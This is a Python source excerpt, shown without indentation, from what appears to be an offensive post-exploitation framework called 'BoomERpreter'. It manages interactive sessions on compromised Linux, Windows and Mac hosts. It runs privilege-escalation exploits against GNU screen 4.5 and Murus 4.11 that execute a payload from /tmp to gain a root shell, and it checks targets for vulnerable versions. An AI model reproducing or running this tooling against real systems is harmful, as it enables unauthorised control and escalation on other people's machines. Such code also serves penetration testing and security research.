def help(self, arg=""):
if arg != "":
aux = "Help to " + arg
name = "help" + sep + "%s" + sep + arg + ".txt"
try:
file_open = name % ("tool")
f = open(file_open, 'r')
except:
try:
file_open = name % ("modules")
f = open(file_open, 'r')
if not self.myModule:
custom_print.info(
"To see this help, first load a module")
return
except:
custom_print.info(aux + " doesn't exist...")
return
print("\n" + aux)
print("-" * len(aux) + "\n")
print(f.read() + "\n")
f.close()
else:
print("\n--- Operations allowed ---\n")
print("______ GLOBAL _______")
for key, value in self._options_start.items():
if type(value) == type([]):
value = value[0]
print(key + ":\n " + value)
print("")
if (self.myModule is not None):
self.myModule.help()
def _delete_session(self, id):
try:
del self.sessions[id]
self.current_session.close()
custom_print.info("Session %s has been closed" % str(id))
except:
custom_print.error("Error deleting session " + str(id))
def shell(self, data):
self.send_msg(data, False)
data = self.current_session.recv(4096)
result = data.decode()
if "No" == result:
custom_print.info("No shell obtained")
return
self.get_shell(result)
def exploit(self, data):
try:
exp = EXPLOITS[data[1]]
except:
custom_print.info("No exploit...")
return
function = exp["function"]
getattr(self, function)([function])
def interact(self, session_id):
try:
session_id = int(session_id)
client = self.sessions[session_id][0]
self.current_session = client
pl = (self.sessions[session_id][1]).lower()
if "linux" in pl:
self.module_session = Linux(self, self.current_session)
custom_print.info("Interacting with: " + pl)
elif "windows" in pl:
self.module_session = Windows(self, self.current_session)
custom_print.info("Interacting with: " + pl)
else:
self.module_session = Mac(self, self.current_session)
custom_print.info("Interacting with: " + pl)
except Exception as e:
print(e)
print("Session no found")
return
self.completer.set_backup()
self.completer.set_all_commands(list(self.module_session.get_functions().keys()),[])
while True:
try:
data_input = input(color.YELLOW + "BoomERpreter >> " + color.RESET)
data_input = data_input.strip()
if data_input == "":
continue
if "exit" in data_input:
self.completer.restore_backup()
self._delete_session(session_id)
return
if "background" in data_input:
custom_print.info("Session %s to background"%str(session_id))
self.completer.restore_backup()
return 1
split_data = data_input.split()
opt = self.module_session.get_functions()[split_data[0]]
if not opt:
continue
if not opt["exec"]:
getattr(self.module_session, opt["function"])()
continue
getattr(self.module_session, opt["function"])(split_data)
except KeyboardInterrupt:
self.completer.restore_backup()
self._delete_session(session_id)
return 0
except Exception as e:
custom_print.error(str(e))
if "Broken pipe" in str(e):
custom_print.info("Meterpreter closed")
self._delete_session(session_id)
return 0
def root_screen45(self, data):
self.send_msg(data, False)
result = self.recv_msg()
if result == "ok":
res = input("The exploit is ready. Launch it?(y/n): ")
if res.lower() == "y":
self.obj_session.send_msg(self.current_session,
["shell", "/tmp/shell"])
data = self.current_session.recv(4096)
data = data.decode()
self.get_shell(data)
else:
custom_print.info("Aborted")
def search(self, word):
self.search_key = ' '.join(word).lower()
custom_print.info("Searching: " + self.search_key)
my_list = []
for path, dirs, files in walk('modules'):
for f in files:
if not "__" in path + '/' + f:
my_list.append(path + '/' + f)
pool = Pool(2)
results = pool.map(self.isIn, my_list)
pool.close()
pool.join()
for result in results:
if result:
print(result.replace(".py", "").replace("modules/", ""))
def murus_root(self, data):
custom_print.info("Waiting.... The victim must start the app")
self.send_msg(data, False)
result = self.recv_msg()
if result == "ok":
res = input("The exploit is ready. Launch it?(y/n): ")
if res.lower() == "y":
self.obj_session.send_msg(self.current_session,
["shell", "/tmp/murus411_exp"])
data = self.current_session.recv(4096)
data = data.decode()
self.get_shell(data)
else:
custom_print.info("Aborted")
else:
print(result)
def check_vuln(self, data):
try:
check = DATA_CHECK[data[1]]
except:
custom_print.info("This app can not be verified")
return
to_check = check["command"]
self.send_msg(["check_vuln", to_check], True)
result = self.recv_msg()
success = False
for values in check["versions"]:
data = list(values.items())
if data[0][0] in result:
custom_print.ok("Vulnerable! " + data[0][1])
success = True
if not success:
custom_print.error("No vulnerable")
def put(self, key, value):
try:
self.options[key][1] = value
custom_print.info(key + " => " + value)
except:
custom_print.error("Wrong option: " + key)
